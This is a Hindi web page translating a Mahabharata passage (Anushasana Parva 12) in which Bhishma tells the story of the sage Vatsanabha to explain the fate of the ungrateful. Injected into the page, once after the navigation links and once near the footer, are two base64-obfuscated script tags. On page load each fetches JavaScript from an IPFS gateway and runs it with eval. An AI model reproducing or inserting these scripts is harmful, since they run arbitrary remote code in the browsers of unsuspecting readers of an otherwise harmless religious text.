महाभारत अनुशासन पर्व अध्याय 12 श्लोक 1-2

अद्‌भुत भारत की खोज
नेविगेशन पर जाएँ खोज पर जाएँ

द्वादश (12) अध्याय: अनुशासन पर्व (दानधर्म पर्व)

महाभारत: अनुशासन पर्व: द्वादश अध्याय: श्लोक 1-2 का हिन्दी अनुवाद

कृतघ्‍न की गति ओर प्रायश्चित का वर्णन तथा स्‍त्री-पुरूष के संयोग में स्‍त्री को ही अधिक सुख होने के सम्‍बन्‍ध में भंगास्‍वन का उपाख्‍यान

युधिष्ठिर ने पूछा – पितामह ! जो मोहवश माता-पिता तथा गुरूजनों का अपमान करते हैं उन कृतघ्‍नों के लिये क्‍या प्रायश्चित है ? यह बताइये। तात ! महाबाहों ! दूसरे भी जो निर्लज्‍ज एवं कृतघ्‍न हैं उसकी गति कैसी होती है ? यह सब मैं यथार्थ रूप से सुनना चाहता हूं। भीष्‍मजी ने कहा - तात् ! कृतघ्‍नों की एक ही गति है, सदा के लिये नरक में पड़े रहना। जो माता-पिता तथा गुरूजनों की आज्ञा के अधीन नहीं रहते हैं वे कृमि, कीट, पिपीलिका और वृक्ष आदि की योनियों में जन्‍म लेते हैं। मनुष्‍या योनि में फिर जन्‍म होना उनके लिये दुर्लभ हो जाता है। इस विषय में जानकार मनुष्‍य इस प्राचीन इतिहास का उदाहरण देते हैं। वत्‍सनाभ नाम वाले एक परम बुद्धिमान् महर्षि कठोर व्र‍त के पालन में लगे थे । उनके शरीर पर दीमकों ने घर बना लिया था, अत: वे ब्रह्मर्षि बांबीरूप हो गये थे और उसी अवस्‍था में वे बड़़ी भारी तपस्‍या करते थे। भरतश्रेष्‍ठ ! उनके तप करते समय इन्‍द्र ने बिजली की चमक और मेघों की गम्‍भीर गर्जना के साथ बड़ी भारी वर्षा आरम्‍भ कर दी। पाकशासन इन्‍द्र ने लगातार एक सप्‍ताह तक वहां जल बरसाया और वे ब्राह्माण वत्‍सनाभ आंख मूंदकर चुपचाप उस वर्षा का आघात सहन करते रहे। सर्दी और हवा से युक्‍त यह वर्षा हो ही रही थी कि बिजली से आहत हो उस वल्‍मीक (बांबी) का शिखर टूटकर बिखर गया। अब महामना वत्‍सनाभर उस वर्षा की चोट पड़ने लगी। यह देख धर्म के हृदय में करूणा भर आयी और उनहोनें वत्‍सनाभ पर अपनी सहज दया प्रकट की। तपस्‍या में लगे हुए उन अत्‍यंत धार्मिक ब्रह्मर्षि की चिन्‍ता करते हुए धर्म के हृदय में शीघ्र ही स्‍वा‍भाविक सुबुद्धि का उदय हुआ, जो उन्‍हीं के अनुरूप थी। वे विशाल और मनोहर भैंस का सा अपना स्‍वरूप बनाकर वत्‍सनाभ की रक्षा के लिये उनके चारों ओर अपने चारों पैर जमाकर उनके उपर खड़े हो गये। धर्मात्‍माओं श्रेष्‍ठ भरतभूषण युधिष्ठिर ! जब शीतल हवा से युक्‍त वह वर्षा बंद हो गयी तब भैंस का रूप धारण करने वाले धर्म धीर से उस वल्‍मीक को छोड़कर वहां से दूर खिसक गये। उस मूसलाधार वर्षा में महिषरूपधारी धर्म के खड़े हो जाने से महातपस्‍वी वत्‍सनाभ की रक्षा हो गयी। तदनन्‍तर वहां सुविस्‍तृत दिशओं, पर्वतों के‍ शिखरों, जल में डूबी हुई सारी पृथ्‍वी और जलाशयों को देखकर ब्राह्माण वत्‍सनाभ बहुत प्रसन्‍न हुए। फिर वे विस्मित होकर सोचने लगे कि 'इस वर्षा से किसने मेरी रक्षा की है। इतने ही में पास ही खड़े हुए उस भैंस पर उनकी दृष्टि पड़ी। 'अहो ! पशुयोनि में पैदा होकर भी यह कैसा धर्मवत्‍सल दिखायी देता है? निश्‍चय ही यह भैंसा मेरे उपर शिलापट्ट के समना खड़ा हो गया था। इसीलिये मेरा भला हुआ है । यह बड़ा मोटा और बहुत मांसल है'। तदनन्‍तर धर्म में अनुराग होने के कारण मुनि के हृदय में यह विचार उत्‍पन्‍न हुआ कि 'जो विश्‍वासघाती एवं कृतघ्‍न मनुष्‍य हैं, वे नरक में पड़ते हैं। 'मैं प्राण-त्‍याग के सिवा कृतघ्‍नों के उद्धार का दूसरा कोई उपाय किसी तरह नहीं पाता। धर्मज्ञ पुरूषों का कथन भी ऐसा ही है। 'पिता-माता का भरण-पोषण न करके तथा गुरूदक्षिणा न देकर मैं कृतघ्‍न भाव को प्राप्‍त हो गया हूं । इस कृतघ्‍नता का प्रायश्चित है स्‍वेच्‍छा से मृत्‍यु को वरण कर लेना। 'अपने कृतघ्‍न जीवन की आकांक्षा और प्रायश्चित की उपेक्षा करने पर भी भारी उपपातक भी बढ़ता रहेगा। अत: मैं प्रायश्चित के लिये अपने प्राणों का परित्‍याग करूंगा। अनासक्‍त चित्‍त से मेरू पर्वत के शिखर पर जाकर प्रायश्चित करने की इच्‍छा से अपने शरीर को त्‍याग देने के लिय उद्यत हो गये । इसी समय धर्म ने आकर उन धर्मज्ञ, धर्मात्‍मा वत्‍सनाभ का हाथ पकड़ लिया। धर्म ने कहा – महाप्राज्ञ वत्‍सनाम्‍भ ! तुम्‍हारी आयु कई सौ वर्षों की है। तुम्‍हारे इस आसक्ति रहित आत्‍मत्‍याग के विचार से मैं बहुत संतुष्‍ट हूं । इसी प्रकार सभी धर्मात्‍मा पुरूष अपने किये हुए कर्म की आलोचना करते है। वत्‍सनाभ ! जगत् में कोई ऐसा पुरूष नहीं है जिसका मन कभी दूषित न हुआ हो। जो मनुष्‍य निन्द्य कर्मों से दूर रहकर सब तरह से धर्म का आचरण करता है वही शक्तिशाली है। महाप्राज्ञ ! अब तुम प्राणत्‍याग के संकल्‍प से निवृत हो जाओं, क्‍योंकि तुम सनातन (अजर-अमर) आत्‍मा हो। यूधिष्ठिर ने पूछा – राजन् ! स्‍त्री और पुरूष के संयोग में विषयसुख की अनुभूति किसको अधिक होती है (स्‍त्री को या पुरूष को) ? इस संशय के विषय में आप यथावत् रूप से बताने की कृपा करें। भीष्‍म जी ने कहा – राजन् ! इस विषय में भी भंगास्‍वन के साथ इन्‍द्र का पहले जो वैर हुआ था, उस प्राचीन इतिहास का उदाहरण दिया जाता है।


« पीछे आगे »

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

संबंधित लेख

साँचा:सम्पूर्ण महाभारत अभी निर्माणाधीन है।

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>